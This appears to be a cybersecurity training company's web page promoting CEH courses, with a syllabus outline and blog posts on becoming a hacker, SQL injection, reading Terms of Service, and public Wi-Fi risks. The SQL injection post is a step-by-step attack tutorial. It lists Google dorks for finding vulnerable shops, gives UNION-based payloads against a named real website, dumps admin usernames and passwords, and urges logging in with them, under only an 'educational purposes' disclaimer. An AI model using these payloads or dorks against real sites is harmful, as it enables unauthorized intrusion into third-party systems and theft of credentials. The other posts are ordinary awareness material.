              • WPA Cracking Tool: KisMAC
              • WEP Cracking Using Cain & Abel
              • WPA Brute Forcing Using Cain & Abel
              • WPA Cracking Tool: Elcomsoft Wireless Security Auditor
              • WEP/WPA Cracking Tools
              • WEP/WPA Cracking Tool for Mobile: Penetrate Pro
            • Wireless Hacking Tools
              • Wi-Fi Sniffer: Kismet
              • Wardriving Tools
              • RF Monitoring Tools
              • Wi-Fi Traffic Analyzer Tools
              • Wi-Fi Raw Packet Capturing and Spectrum Analyzing Tools
              • Wireless Hacking Tools for Mobile: HackWifi and Backtrack Simulator
            • Bluetooth Hacking
              • Bluetooth Stack
              • Bluetooth Threats
              • How to BlueJack a Victim?
              • Bluetooth Hacking Tool
                • Super Bluetooth Hack
                • PhoneSnoop
                • BlueScanner
              • Bluetooth Hacking Tools
            • Counter-measures
              • How to Defend Against Bluetooth Hacking?
              • How to Detect and Block Rogue AP?
              • Wireless Security Layers
              • How to Defend Against Wireless Attacks?
            • Wireless Security Tools
              • Wireless Intrusion Prevention Systems
              • Wireless IPS Deployment
              • Wi-Fi Security Auditing Tool
                • AirMagnet WiFi Analyzer
                • Motorola’s AirDefense Services Platform (ADSP)
                • Adaptive Wireless IPS
                • Aruba RFProtect
              • Wi-Fi Intrusion Prevention System
              • Wi-Fi Predictive Planning Tools
              • Wi-Fi Vulnerability Scanning Tools
              • Bluetooth Security Tool: Bluetooth Firewall
              • Wi-Fi Security Tools for Mobile: Wifi Protector, WiFiGuard, and Wifi Inspector
            • Wi-Fi Pen Testing
              • Wireless Penetration Testing
              • Wireless Penetration Testing Framework
              • Wi-Fi Pen Testing Framework
              • Pen Testing LEAP Encrypted WLAN
              • Pen Testing WPA/WPA2 Encrypted WLAN
              • Pen Testing WEP Encrypted WLAN
              • Pen Testing Unencrypted WLAN

 

Hacking Mobile Platforms

  • Mobile Platform Attack Vectors
    • Vulnerable Areas in Mobile Business Environment
    • OWASP Mobile Top 10 Risks
    • Anatomy of a Mobile Attack
    • How a Hacker can Profit from Mobile when Successfully Compromised
    • Mobile Attack Vectors
    • Mobile Platform Vulnerabilities and Risks
    • Security Issues Arising from App Stores
    • App Sandboxing Issues
    • Mobile Spam
    • SMS Phishing Attack (SMiShing) (Targeted Attack Scan)
      • Why SMS Phishing is Effective?
      • SMS Phishing Attack Examples
    • Pairing Mobile Devices on Open Bluetooth and Wi-Fi Connections
  • Hacking Android OS
    • Android OS
    • Android OS Architecture
    • Android Device Administration API
    • Android Vulnerabilities
    • Android Rooting
      • Rooting Android Phones using SuperOneClick
      • Rooting Android Phones Using Superboot
      • Android Rooting Tools
    • Hacking Networks Using Network Spoofer
    • Session Hijacking Using DroidSheep
    • Android-based Sniffer
      • FaceNiff
      • Packet Sniffer, tPacketCapture, and Android PCAP
    • Android Trojan
      • ZitMo (ZeuS-in-the-Mobile)
      • FakeToken and TRAMP.A
      • Fakedefender and Obad
      • FakeInst and OpFake
      • AndroRAT and Dendroid
    • Securing Android Devices
    • Google Apps Device Policy
    • Remote Wipe Service: Remote Wipe
    • Android Security Tool
      • DroidSheep Guard
      • TrustGo Mobile Security and Sophos Mobile Security
      • 360 Security, AVL, and Avira Antivirus Security
    • Android Vulnerability Scanner: X-Ray
    • Android Device Tracking Tools
  • Hacking iOS
    • Apple iOS
    • Jailbreaking iOS
      • Types of Jailbreaking
      • Jailbreaking Techniques
      • App Platform for Jailbroaken Devices: Cydia
      • Jailbreaking Tool: Pangu
      • Untethered Jailbreaking of iOS 7.1.1/7.1.2 Using Pangu for Mac
      • Jailbreaking Tools
        • Redsn0w and Absinthe
        • evasi0n7 and GeekSn0w
        • Sn0wbreeze and PwnageTool
        • LimeRa1n and Blackra1n
      • Guidelines for Securing iOS Devices
      • iOS Device Tracking Tools
    • Hacking Windows Phone OS
      • Windows Phone 8 Architecture
      • Secure Boot Process
      • Guidelines for Securing Windows OS Devices
      • Windows OS Device Tracking Tool: FollowMee GPS Tracker
    • Hacking BlackBerry
      • BlackBerry Operating System
      • BlackBerry Enterprise Solution Architecture
      • Blackberry Attack Vectors
        • Malicious Code Signing
        • JAD File Exploits and Memory/ Processes Manipulations
        • Short Message Service (SMS) Exploits
        • Email Exploits
        • PIM Data Attacks and TCP/IP Connections Vulnerabilities
      • Guidelines for Securing BlackBerry Devices
      • BlackBerry Device Tracking Tools: MobileTracker and Position Logic Blackberry Tracker
      • Mobile Spyware: mSpy and StealthGenie
      • Mobile Spyware
    • Mobile Device Management (MDM)
      • MDM Solution: MaaS360 Mobile Device Management (MDM)
      • MDM Solutions
      • Bring Your Own Device (BYOD)
        • BYOD Risks
        • BYOD Policy Implementation
        • BYOD Security Guidelines for Administrator
        • BYOD Security Guidelines for Employee
      • Mobile Security Guidelines and Tools
        • General Guidelines for Mobile Platform Security
        • Mobile Device Security Guidelines for Administrator
        • SMS Phishing Countermeasures
        • Mobile Protection Tool
          • BullGuard Mobile Security
          • Lookout
          • WISeID
          • zIPS
        • Mobile Protection Tools
        • Mobile Anti-Spyware
      • Mobile Pen Testing
        • Android Phone Pen Testing
        • iPhone Pen Testing
        • Windows Phone Pen Testing
        • BlackBerry Pen Testing
        • Mobile Pen Testing Toolkit
          • zANTI
          • dSploit
          • Hackode (The Hacker’s Toolbox)

 

Evading IDS, Firewalls, and Honeypots

  • IDS, Firewall and Honeypot Concepts
    • Intrusion Detection Systems (IDS) and their Placement
      • How IDS Works?
      • Ways to Detect an Intrusion
      • General Indications of Intrusions
      • General Indications of System Intrusions
      • Types of Intrusion Detection Systems
      • System Integrity Verifiers (SIV)
    • Firewall
      • Firewall Architecture
      • DeMilitarized Zone (DMZ)
      • Types of Firewall
        • Packet Filtering Firewall
        • Circuit-Level Gateway Firewall
        • Application-Level Firewall
        • Stateful Multilayer Inspection Firewall
      • Honeypot
        • Types of Honeypots
      • IDS, Firewall and Honeypot System
        • Intrusion Detection Tool: Snort
        • Snort Rules
          • Rule Actions and IP Protocols
          • The Direction Operator and IP Addresses
          • Port Numbers
        • Intrusion Detection Systems: Tipping Point
        • Intrusion Detection Tools
        • Intrusion Detection Tools for Mobile
          • Firewall
          • ZoneAlarm PRO Firewall 2015
          • Comodo Firewall
        • Firewalls
        • Firewalls for Mobile: Android Firewall and Firewall iP
        • Firewalls for Mobile
        • Honeypot Tool: KFSensor and SPECTER
        • Honeypot Tools
        • Honeypot Tool for Mobile: HosTaGe
      • Evading IDS
        • Insertion Attack
        • Evasion
        • Denial-of-Service Attack (DoS)
        • Obfuscating
        • False Positive Generation
        • Session Splicing
        • Unicode Evasion Technique
        • Fragmentation Attack
          • Overlapping Fragments
        • Time-To-Live Attacks
        • Invalid RST Packets
        • Urgency Flag
        • Polymorphic Shellcode
        • ASCII Shellcode
        • Application-Layer Attacks
        • Desynchronization – Pre Connection SYN
        • Desynchronization – Post Connection SYN
        • Other Types of Evasion
      • Evading Firewalls
        • Firewall Identification
          • Port Scanning
          • Firewalking
          • Banner Grabbing
        • IP Address Spoofing
        • Source Routing
        • Tiny Fragments
        • Bypass Blocked Sites Using IP Address in Place of URL
        • Bypass Blocked Sites Using Anonymous Website Surfing Sites
        • Bypass a Firewall Using Proxy Server
        • Bypassing Firewall through ICMP Tunneling Method
        • Bypassing Firewall through ACK Tunneling Method
        • Bypassing Firewall through HTTP Tunneling Method
        • Why do I Need HTTP Tunneling
        • HTTP Tunneling Tools
          • HTTPort and HTTHost
          • Super Network Tunnel
          • HTTP-Tunnel
        • Bypassing Firewall through SSH Tunneling Method
        • SSH Tunneling Tool: Bitvise
        • Bypassing Firewall through External Systems
        • Bypassing Firewall through MITM Attack
        • Bypassing Firewall through Content
      • IDS/Firewall Evading Tools
        • IDS/Firewall Evasion Tool
          • Traffic IQ Professional
          • tcp-over-dns
        • IDS/Firewall Evasion Tools
        • Packet Fragment Generator: Colasoft Packet Builder
        • Packet Fragment Generators
      • Detecting Honeypots
        • Detecting Honeypots
        • Honeypot Detecting Tool: Send-Safe Honeypot Hunter
      • IDS/Firewall Evasion Counter-measures
        • Countermeasures
      • Penetration Testing
        • Firewall/IDS Penetration Testing
        • Firewall Penetration Testing
        • IDS Penetration Testing

 

Cloud Computing

  • Introduction to Cloud Computing
    • Types of Cloud Computing Services
    • Separation of Responsibilities in Cloud
    • Cloud Deployment Models
    • NIST Cloud Computing Reference Architecture
    • Cloud Computing Benefits
    • Understanding Virtualization
    • Benefits of Virtualization in Cloud
  • Cloud Computing Threats
  • Cloud Computing Attacks
    • Service Hijacking using Social Engineering Attacks
    • Service Hijacking using Network Sniffing
    • Session Hijacking using XSS Attack
    • Session Hijacking using  Session Riding
    • Domain Name System (DNS) Attacks
    • Side Channel Attacks or Cross-guest VM Breaches
      • Side Channel Attack Countermeasures
    • SQL Injection Attacks
    • Cryptanalysis Attacks
      • Cryptanalysis Attack Countermeasures
    • Wrapping Attack
    • Denial-of-Service (DoS) and Distributed Denial-of-Service (DDoS) Attacks
  • Cloud Security
    • Cloud Security Control Layers
    • Cloud Security is the Responsibility of both Cloud Provider and Consumer
    • Cloud Computing Security Considerations
    • Placement of Security Controls in the Cloud
    • Best Practices for Securing Cloud
    • NIST Recommendations for Cloud Security
    • Organization/Provider Cloud Security Compliance Checklist
  • Cloud Security Tools
    • Core CloudInspect
    • CloudPassage Halo
    • Cloud Security Tools
  • Cloud Penetration Testing
    • What is Cloud Pen Testing?
    • Key Considerations for Pen Testing in the Cloud
    • Scope of Cloud Pen Testing
    • Cloud Penetration Testing
    • Recommendations for Cloud Testing

 

 

Cryptography

  • Market Survey 2014: The Year of Encryption
  • Case Study: Heartbleed
  • Case Study: Poodlebleed
  • Cryptography Concepts
    • Cryptography
    • Types of Cryptography
    • Government Access to Keys (GAK)
  • Encryption Algorithms
    • Ciphers
    • Data Encryption Standard (DES)
    • Advanced Encryption Standard (AES)
    • RC4, RC5, RC6 Algorithms
    • The DSA and Related Signature Schemes
    • RSA (Rivest Shamir Adleman)
      • The RSA Signature Scheme
      • Example of RSA Algorithm
    • Message Digest (One-way Hash) Functions
      • Message Digest Function: MD5
    • Secure Hashing Algorithm (SHA)
    • What is SSH (Secure Shell)?
  • Cryptography Tools
    • MD5 Hash Calculators: HashCalc, MD5 Calculator and HashMyFiles
    • Hash Calculators for Mobile: MD5 Hash Calculator, Hash Droid, and Hash Calculator
    • Cryptography Tool
      • Advanced Encryption Package 2014
      • BCTextEncoder
    • Cryptography Tools
    • Cryptography Tools for Mobile: Secret Space Encryptor, CryptoSymm, and Cipher Sender
  • Public Key Infrastructure(PKI)
    • Certification Authorities
    • Signed Certificate (CA) Vs. Self Signed Certificate
  • Email Encryption
    • Digital Signature
    • SSL (Secure Sockets Layer)
    • Transport Layer Security (TLS)
    • Cryptography Toolkit
      • OpenSSL
      • Keyczar
    • Pretty Good Privacy (PGP)
  • Disk Encryption
    • Disk Encryption Tools: Symantec Drive Encryption and GiliSoft Full Disk Encryption
    • Disk Encryption Tools
  • Cryptography Attacks
    • Code Breaking Methodologies
    • Brute-Force Attack
    • Meet-in-the-Middle Attack on Digital Signature Schemes
    • Side Channel Attack
      • Side Channel Attack – Scenario
    • Cryptanalysis Tools
      • Cryptanalysis Tool: CrypTool
      • Cryptanalysis Tools
      • Online MD5 Decryption Tool

Call us to today to attend CEH Training:  08034121380

https://www.soutechventures.com/courses/ 

 

Want to become a Hacker? What you must do!- Soutech Ventures CEH training

You are a beginner whose intention is to learn how to hack but you’re wondering where to start from. If you are in this category, then I’ve got your back, you are definitely in the right place. If you’ve noticed, most of the free books and resources on hacking you may find on the internet are actually crafted for persons with some level of knowledge in the specified subject area. These materials do not give a comprehensive knowledge of the hacking scheme.

This is however the reason why I have decided to post something for the beginners and anyone who needs to start their journey into the hacking world and being hackers. I am going to describe a few requirements and the basic things to do to make the journey a pleasant experience for you.

 What is the Best way to Learn hacking as a beginner?

Here are a few steps; Lets go-

STEP 1: Start with the Basics

I will in my usual way always advice beginners who have had a little or not even a slight knowledge of hacking before to begin from the basics. Do not just learn how to hack anything but you can instead start exploring or doing some research about topics in IT such as computer networks, network services and common ports (FTP, TCP, SMTP, HTTP, HTTPS, DNS etc.), firewalls, some common and widely used network protocols, IP addresses. You can also their working mechanism.

You may also learn about some operating systems such as Linux which is one of the basic operating systems useful in the hacking environment. Just so you know, the more you know about the basic working principle of IT-related topics and concepts, the easier it becomes for you to find vulnerabilities and device exploits. This will also go a long way to help you when applying your hacking techniques in practice. Hacking covers the weaknesses or vulnerabilities in every field in IT, so you need to some extent a good background in basics. So begin your research now.

Step 2: Get a reliable and good source to begin your learning

If you desire to have a fair knowledge or basic hacking and the trending technologies in the IT field, there are books online and websites that can equip you technically. These books can also give you some technical background in vulnerabilities and any possible ways to exploit these vulnerabilities. However, it can be very difficult to find such books and web resources that can directly teach you how to hack from the basics in a simple and easy way.

If one has a fair amount of experience in the field of hacking, there exists so many books and websites that give out technical information on latest vulnerabilities along with possible ways to exploit them. However, for beginners it is hard to find sources that teach hacking right from the basics in a simple and easy to follow manner.

Step 3: Learn a programming Language (Optional)

Learning a programming language keeps you a step ahead of any hacker and any acquired skill. There are a lot of readily available programs and ready-made tools that can give you easy access to hack, it is always better to have some basic knowledge of programming scripts and languages like JavaScripts, PHP so that you can be in a position to manufacture you won tools in order to exploit codes. Like I said in the heading of this step, it is totally optional, there are very hackers who do not major in programming.

Step 4: Enroll for an Enthical Hacking Course

One of the courses that has been structured to give you apt and excellent knowledge and skill in hacking is the EC Council Certified Ethical Hacker (CEH) course. There are other courses that are in this line such as CISSP which is governed by another body. But CEH is a basic start for you if you must learn about hacking and be very grounded. CEH v9 offers about 19 modules that are well structured to cover all the IT fields.

If you are in Nigeria and in the cities of Abuja and Lagos precisely and you intend to take up a CEH course, you can call us today at Soutech ventures or visit our website. You have every information you may need. We have experienced and certified tutors in this field that can teach you with clear and simple breakdown of concepts of the CEH syllabus. So be sure you have made a right choice in Soutech.

How Long does it take to be a Good Hacker?

I always tell my students that hacking cannot be mastered overnight and the process must never be rushed. It is a field that combines in-depth knowledge, skills, creativity, dedication and a great deal of time to be invested. It may take between a few months to a few years to develop and be skillful in hacking depending on the time and effort you invest. Infact, everyone can become very skillful but it depends on the on how they learn and their foundations they build. The foundation you give yourself matters a great deal, if the foundation is lagging in a certain aspect, you will have issues in understanding and working on some technical details. So, if you want to become a good hacker, all you need is the passion to learn and a good source of knowledge that will help you understand the basics added with some level of patience and perseverance.

 

 

Tutorial on SQL Injection: SOUTECH Ventures

What is SQL Injection?

SQL Injection often referred to as seqel-i or structured query language is a malicious attempt on a website whereby an attacker injects an SQL command (payload) into an SQL statement which controls the database of a web application. The web application can also be referred to as Relational Database Management System (RDBMS) and it has a web input field.

SQL injection vulnerabilities have been known to damage websites or web apps that use SQL-based database. SQLi’s have been known over time to be one of the lethal means of attacking websites whereby an attacker attempts to exploit a web application. In order to bypass the authentication and authorization mechanisms in a web application, the attacker will attempt to gain unauthorized access to the web app using SQLi. The attacker or malicious user after gaining access into the web application, can delete, modify or even update the database, make changes to the columns or rows depending on what their intentions are at the time. When this is done, the data integrity of the SQL-based database will be compromised.

How Does SQL Injection work?

In order to exploit the web application, all the attacker has to do is to find an input field that is embedded in the SQL query of the database. A vulnerable website requires a direct user input in the SQL statement in order for an SQLi attack to take place. When this is done, the attacker then injects the payload which is included in the SQL query which in turn is used to launch the attack on the web server.

Before you launch any attack, you have to check the server to see how it responds to user inputs for authentication mechanism. Use the following queries to verify the users authentication mechanism:

 

 

 

 

// define POST variables
$Uname = $_POST[‘name’];
 $Upassword = $_POST[‘password’];

// sql query vulnerable to SQLi
$sql = “SELECT id from users where username = ‘Uname’ && password = ‘Upassword’ “;

// execute the sql query by database
database.execute($sql);

The codes above are vulnerable to SQL injection and the attacker can submit the malicious payload in the SQL query gain access to the web application by altering the SQL statement that is being executed.

One example of an SQL injection payload that can be used to set a password field is

Password’ OR ‘1’=’1’

where this condition is always true, the result of this query being run against the web server is

SELECT id FROM users WHERE username=’username’ AND password=’password’ OR 1=1’

What an attacker can do with SQL?

SQL is a programming language that is used to work with the relational database management systems. Like I said earlier, SQL’s can be used to delete, modify or update databases or columns, rows, tables within the RDBMS databases. SQL is one powerful language that can be used to attack databases and can be used by attackers to exploit databases of web applications, taking total charge of the application without the knowledge of the administrator.

Having said all this, let us see what an attacker can use SQLi to do.

  • It can be used to bypass authentication mechanisms or to impersonate a specific user
  • It can be used by an attacker to delete records from a database and even if an authorized backup plan is used, deleted data can affect the availability of an application until the database can be restored.
  • SQL’s can be used to select data based on a set of input queries which gives outputs of the query. It could allow the disclosure of data residing on the web server.
  • SQL’s can be used to alter or modify data in the database. And as you know when data is altered, the integrity is lost and issues regarding repudiation can come up such as voiding transactions, altering balances and other records.
  • The database of web servers are configured to allow the arbitrary execution of operating system commands. When are conditions are present, a malicious user can use SQLi to bypass firewalls and penetrate the internal network.

Using SQL Injection to Hack a Website

Now let us see how we can use SQL injection to hack websites

Step 1

The first thing is to search google for “google dorks”. I have gotten the following results from my search. You can as well search for yours.

about.php?cartID=
accinfo.php?cartId=
acclogin.php?cartID=
add.php?bookid=
add_cart.php?num=
addcart.php?
addItem.php
add-to-cart.php?ID=
addToCart.php?idProduct=
addtomylist.php?ProdId=
adminEditProductFields.php?intProdID=
advSearch_h.php?idCategory=
affiliate.php?ID=
affiliate-agreement.cfm?storeid=
affiliates.php?id=
ancillary.php?ID=
archive.php?id=
article.php?id=
phpx?PageID
basket.php?id=
Book.php?bookID=
book_list.php?bookid=
book_view.php?bookid=
BookDetails.php?ID=
browse.php?catid=
browse_item_details.php
Browse_Item_Details.php?Store_Id=
buy.php?
buy.php?bookid=
bycategory.php?id=
cardinfo.php?card=
cart.php?action=
cart.php?cart_id=
cart.php?id=
cart_additem.php?id=
cart_validate.php?id=
cartadd.php?id=
cat.php?iCat=
catalog.php
catalog.php?CatalogID=
catalog_item.php?ID=
catalog_main.php?catid=
category.php
category.php?catid=
category_list.php?id=
categorydisplay.php?catid=
checkout.php?cartid=
checkout.php?UserID=
checkout_confirmed.php?order_id=
checkout1.php?cartid=
comersus_listCategoriesAndProducts.php?idCategory=
comersus_optEmailToFriendForm.php?idProduct=

This is just a few of the basic dorks that are available but you can also create your own dorks in order to find websites. These dorks can help you find out sites that are vulnerable to SQL injections in order to bypass the authentication.

STEP 2

Search google for SQL-vulnerable websites. Next thing is to open one of them to check if they can be vulnerable to SQLi’s.

I will use this website as an example.

http://www.tadspec.com/index.php?id=44

Now after you choose your link, make sure it is different from mine because there are many available sites.

Please note, that this practical session is just for educational purposes and therefore I do not in any way take responsibility for your actions.

Now lets check if the site I have chosen is vulnerable to SQL or not. This can be done by putting this code behind the URL

.php?id=44   (You can copy and paste it with an apostrophe (‘) at the end of that code.

If after you do this and you get a result like this;

  • “You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ”’ at line 1.”

Then bingo, then site is vulnerable an SQL injection attack. Therefore, we can go ahead to the next step.

STEP 3

In this step, we have to check the number of columns that are available on the database of the website. We can manually input these numbers, so we can check the columns;

http://www.tadspec.com/index.php?id=44 order by 32

 

Please note that the number “32” is an arbitrary number and it varies depending on the number of columns you may find. So, you have to make an arbitrary attempt to check the columns that are available on the database.

After putting “32”, this is what you get

Unknown column ‘32’ in ‘order clause’

And if we put the link below in URL,

http://www.tadspec.com/index.php?id=43 order by 31

This will redirect us to the website’s homepage which means that it is working correctly.

It therefore means that the number of the columns available on the database of this website is 31.

STEP 4

In this fourth step, we’re going to be determining the version of the database.

We will use the following query;

http://www.tadspec.com/index.php?id= null union all select 1,2,3,4,5,6,7,8,9,10,11-

When you run this query, you will get a number that shows boldly on your screen. Mine is 6. So, in the place of 6 in your URL, replace t @@version. This will give you the version that would give you the version of the SQL database that the website uses.

So, you have something like

http://www.tadspec.com/index.php?id= null union all select 1,2,3,4,5,@@version,7,8,9,10,11-

STEP 5

We will use the next query ‘group_concat(table_name)’ on the place of column#6 and some other string in the last part of the code.

So, its going to be like this;

http://www.tadspec.com/index.php?id=null union all select 1,2,3,4,5,group_concat(table_name),7,8,9,10,11-from information_schema.tables where table_schema=database()-

Now the result of this query will be the names of the database tables. You can just copy them if you desire to use them for further analysis.

STEP 6

We will now try to find the column names in the database by changing the table to column in the fields.

http://www.tadspec.com/index.php?id= null union all select 1,2,3,4,5,group_concat(table_name),7,8,9,10,11-from information_schema.columns where table_schema=database()-

When you enter this query, the result you will get will be the names of the different tables that are present on this website.

STEP 7

Recall that in the previous step, we were able to get the names of the columns in the database so the next thing is to search for the column called “credential” because it can be used to retrieve sensitive data such as usernames and passwords. These are the columns that give access to the database.

Use this query to navigate there;

http://www.tadspec.com/index.php?id= null union all select 1,2,3,4,5,group_concat(username,0x3a,password),7,8,9,10,11-from admin-

The group_concat() method was used to pass the username and then the 0x3a which is used for space and then the other column name. We removed the query and wrote admin table at the end of it and it means we are using the column names from the admin table.

If you have succeeded in this, then Congratulations you successfully performed an SQL injection.
Go ahead search the website login page and input those credentials in the fields present.

Please note that this tutorial is strictly for Educational purposes. We at SOUTECH are not responsible for your actions.

I have withheld some of the diagrams and pictorial explanations and if you must learn about them, enroll to our CEH course to learn comprehensively about this subject topic and more. Call us today.

 

Terms of Service: Do you ever read them? Stay Informed

Some people have a habit of not reading through the Terms of Service whenever they want to get a new application or buy a new device. I must let you know that this is a big mistake because most of the apps that are available in the market commonly known as graywares rely on you to get access to your personal information. The developers know that a lot of people do not read through the Terms and Service so they often include languages that are capable of authorizing a massive invasion of privacy. You may have noticed at the same time that most of the Terms and Services are just boilerplates. Now how do you read through a Terms of Service in order to find out what it is it as concerning privacy without having to waste a lot of time on reading standard terminology?

What are Terms of Service?

The Terms of Service commonly abbreviated as ToS is legal document b\used by websites and internet service providers (ISPs) that contain user’s personal information like social networking services and e-commerce.

Elements of Terms of Service?

A typical ToS contains the following

  • Definition of keywords and phrases and disambiguation.
  • Rights and responsibilities of the User.
  • Expected/proper usage or a potential misuse
  • Accountability for all online actions, conducts and behaviour
  • Outline of personal use also known as privacy policy
  • Details concerned with payments like membership or subscription fees etc
  • Policies for opting out-detailed procedures for opting out.
  • Arbitration carrying details of how the dispute is to be resolved and the extent of rights to take issues to court.
  • Notification of the user whenever any modification is made.

 

Privacy Policy

I mentioned privacy policy to be a key element of Terms of Service. Now I will shed some more light on privacy policies.

The area you really have to focus on when reading Terms of Service is the privacy policy because it is the aspect that handles security and integrity of your data. Every other information on the ToS is not really necessary as regards securing your data. Therefore, whenever you come across a typical ToS, just scroll to the part that has the privacy policy and start reading from there.

 

There is a second problem you may come across while reading through the ToS, which is the fact that the Terms of Service are usually written in legalese. This makes understanding some worth difficult even for people who are in the habit of reading such documents.

Let me teach you how to decipher the privacy policy document.

The first thing you must know is that every privacy policy basically has five parts:

  • Notice: This part basically is the most important part of the privacy policy. It tells you what information you will collect and how that information will be used. It describes the information practices.
  • Security: This is also another important part of the privacy policy in that it informs you on what the company is doing in order to secure the data that they have gotten from you. Possible security measures include: Administrative security, physical security and technical security.
  • Access and Correction: This is the part that details out who can access your data and who the data can be shared with and the circumstances.
  • Consumer choice: It provides an opt-out option as to how consumers may disclose their personal information to any unaffiliated third party agent.
  • Enforcement: This involves details out measures on how to enforce the privacy policy. This can be managed by the company or by a third party independent agent such as BBBOnline and TRUSTe to check for compliance to the privacy policies.

Please take note that every renowned and reputable organization desires that their privacy policy is transparent as much as it can be while also adhering to the letter of the law. But on the hand, there are companies that may want to take advantage of you and therefore will make their policies unnecessarily complicated.

Details to look for in a Typical Privacy Policy

Since there is a plethora of privacy policies for different companies readily available online, it can be however very difficult to streamline directly to what can be found on the privacy policy. However, these are a few things you can look out for

  • A comprehensive list of what kind of data is required from you. There are some kind of information organizations have to collect from you in order to make their products function for you. They always have to tell you what the type of data that should be collected from you.
  • A list of all the persons they are sharing information with and why they should share the information. The general language here will be vague such as third parties.

But under what circumstances should your data be collected from you? And do they only share this with companies that have security policies and is it done in the course of a normal business transaction?

Now, if there are not properly explained clauses as to who these third parties actually are and when they can share your personal data, then this can be a big warning signal for you.

  • The language of the privacy policy should be focused on how they are intending to protect your data. This will include a detailed explanation on how the data is stored. Now carefully look through for this part in the privacy policy. If it is missing then it is as well a good warning for you, go on and look for another or better still a competing piece of software or hardware device that performs the same function.
  • If you have any doubts, be sure to send an email to the customer service of the provider with all your questions clearly outlined. Reputable organizations or companies will normally and most likely answer all your questions promptly.

Sometimes the problem may not be that the company does not want to answer your questions or do they have an intention to do some nefarious with your personal data. It might just be that they are not taking seriously your internet security and privacy seriously enough. This can be just a type of lax security which sets you and them up for a major security breach.

As parting words, it is very important that you take a little time to read through licensed documents and terms of services. At least scroll through for a minute before checking the “i agree” box. Subscribe to learn our security course at SOUTECH Ventures where you will thought and equipped on things you need to know in order to become security conscious. Call us today to get a certification in CEH.

 

Just how safe are Public Wi-Fi’s?Stay protected- Soutech ventures

Having Wi-Fi readily available in public places has become a trend in larger cities of the world. Public places such as restaurants, coffee shops, libraries, hotel rooms, auxiliary offices, airports and other places you can think of have all adopted the use of Wi-Fi. Having a free and easily accessible internet connection to use can be a very convenient way of catching up with your work, meeting targets, accessing your online accounts, checking your mails etc. However, we seem not to know to the security risks associated with the use of publicly available Wi-Fi’s. Well, like you know already that one of best ways to optimally and speedily access your sensitive information and carryout sensitive transactions through Wi-Fi, there are some measures you need to take additionally in order to kept safe online which is the purpose of this write up.

According to a popular research journal published by Norton, said that over 68% people fell victim to publicly available and unsecured Wi-Fi’s in the last year. Therefore, we must take practical measures and efforts to make sure our devices are kept safe and protected.

Brief History in the encryption standard adopted by the Wi-Fi

Let me shade some more light on the encryption protocols and standards that existed before the encryption protocol adopted for use by Wi-Fi’s. One of the security problems faced by older encryption standards is in the aspect of security which was adopted by some wireless networks. One of the first encryption schemes for wireless network devices was the Wireless Encryption Protocol (WEP) and this encryption standard was found to be weak and very easy to crack. Although the WEP protocol is still regularly found as an option in many wireless access points and devices, there is need to give way for upgrading hardware that will be supported by newer standards whenever it is possible.

WEP was developed with the intention to manage the following;

  • To prevent eavesdropping in communications which aims at reducing any forms of unauthorized disclosure of data.
  • To ensure data integrity while it flows across the network.
  • Encryption of packets during transmission using a shared secret key.
  • To allow access control, confidentiality and integrity in a lightweight and efficient system.

However, WEP failed in handling some of these issues which birth WPA.

The Wireless Protected Access (WPA) came as a successor to WEP and was birth with the intention of checking and curbing the many issues faced by the WEP standard. This is the reason why its encryption abilities addressed some vulnerabilities however it was being found vulnerable and cracked. It was designed not to required full hardware upgrades as compared to the WEP.

However, its processing power and mechanisms were being limited especially where older versions of hardwares were involved. The TKIP standard was one of the standards developed to platform the WPA. TKIP was an improved standard for the WEP protocol because at every point there is a static and unchanging key being used for every frame transmitted.

WPA however suffered from the following flaws;

  • Weak key selection by users
  • Issues of packet spoofing
  • Issues with authentication as regards Microsoft Challenge Handshake.

This gave way to the WPA2 standard intended to address the flaws in WPA. WPA came with a stronger and tough encryption standard which are CCMP (Counter Mode with Cipher Block Chaining Message Authentication Code Protocol) and AES (Advanced Encryption Standard). It also employs the TKIP Temporary Key Integrity Protocol and MIC (Message Integrity Code) as encryption standards.

This enterprise is a version that incorporates the EAP standard as a medium to improve the strength of the security and also make the system scalable for use in large organisations and enterprises. WPA2 is special because it offers an improved security when compared over its predecessors and maintains the IEEE 802.11i standard for security. It uses a server to carry out its key management and authentication for its wireless clients.

The WEP, WPA and WPA2 all suffer serious vulnerability issues which an attacker can exploit in order to take advantage of the victim. All of them offer ways to be exploited in recent times.

Why Public Wi-Fi is Vulnerable to cyber attacks

Given all the risk associated with all the protocols described above, users still suffer a great deal from unknown and known flaws. The fact that you may need a password to log in to access the Wi-Fi does not mean that your activities online are encrypted and that a publicly available Wi-Fi is secure. There a few issues that make public Wi-Fi’s susceptible to attacks and one of the issues related to the encryption protocol which the Wi-Fi technology adopts. Another issue has to do with the possibility of connecting to a rogue Wi-Fi hotspot. Tools like Aircrack-ng have been built and are readily available online to perform brute force attacks on any weak passwords and keys involving WEP and WPA.

The risk of joining a rogue Wi-Fi hotspot is also a big issue when using free public Wi-Fi’s. All a hacker has to do is to create a rogue hotspot with the intention of unleashing a sort of Man-in-the-middle (MITM) attack on whoever becomes a victim by connecting to the rogue Wi-Fi. When this attack occurs, it allows a hacker to intercept the communication that goes on between you and the server of the website you are visiting at a time. There are pre-built tools that can be used to easily eavesdrop, capture sensitive information like login credentials, credit card numbers and social media security passwords etc. and monitor online traffic for performing MITM attacks

 

What are the signs that you may have logged on to a Rogue Wi-Fi?

Of course, you know that once a device discovers a Wi-Fi network it probes the known networks which an attacker can leverage on. An attacker can configure a rouge Wi-Fi hotspot which can look like a typical home network that can be found in a coffee shop. Therefore, your device can be connected to the hackers’ rogue Wi-Fi hotspot instead of connecting to the real publicly available Wi-Fi hotspot.

Another trick you should know is that, a public Wi-Fi network can be created with the name Free Wi-Fi which is flooded for victims to be connected to them and very naturally people will want to join such networks especially if the free internet service is offered. I must say I personally has been a victim to this a few years ago. If you are at a coffee shop, or at home or in a public place and suddenly your device shows you have been connected to your home network, there are huge chances that someone has been able to grab your devices’ or computers broadcast request. If also you are browsing a website or webpage such as your bank or favorite social media page that should normally be HTTPS instead it shows HTTP, then you must know that someone might have connected to your network. Once this person has linked up to your network, the person can perform a MITM attack by serving you a HTTP version of the site with the intention of capturing your login credentials. So, you must always be on the lookout these little details.

 

What are the Measures you can take to ensure your safety on a Public Wi-Fi?

